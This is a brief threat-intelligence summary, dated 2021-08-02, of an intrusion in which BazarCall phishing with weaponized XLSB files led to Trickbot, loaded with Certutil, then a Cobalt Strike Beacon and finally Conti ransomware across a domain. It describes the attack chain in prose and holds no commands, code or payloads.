BazarCall to Conti Ransomware via Trickbot and Cobalt Strike
released on 2021-08-02 @ 09:05:30 AM
Threat actors used BazarCall to install Trickbot in the environment which downloaded and executed a Cobalt Strike Beacon. The Trickbot payload came from a phishing campaign associated with BazarCall, delivering weaponized XLSB files. Certutil was used to download and load the Trickbot DLL into memory. A couple days later, the threat actors came back and executed Conti ransomware across the domain.